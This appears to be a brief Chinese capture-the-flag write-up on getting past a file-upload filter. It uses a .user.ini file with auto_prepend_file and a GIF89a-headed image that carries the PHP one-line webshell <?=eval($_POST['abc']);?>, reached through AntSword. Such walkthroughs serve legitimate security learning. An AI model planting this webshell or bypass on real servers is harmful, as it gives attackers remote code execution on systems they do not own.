检查文件内容是否有php字符串
检查后缀中是否有htaccess或ph
检查文件头部信息
文件MIME类型
(以上是此题考查内容)
打开题目先上传一个.txt文件看一下能不能直接上传跟预想的一样,根本不可能
那就上传个图片马试一下
嗯,还是不行那是怎么回事呢去查看了下别人的wp了解的是本题考查.user.ini 去聊了下.user.in原理就是.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell(个人认为和.htaccess用法有点相同)
那就写一个.user.ini文件上传
内容如下:
GIF89a
auto_prepend_file=文件名那就先上传.user.ini
在上传你的图片马
图片马内容如下:
GIF89a
<?=eval($_POST['abc']);?>
(为什么不是标准的上传口令呢是因为他会过滤内容的php利用短签来绕过达到本来的效果)
蚁剑连接执行木马进入图片马所在的数据库
over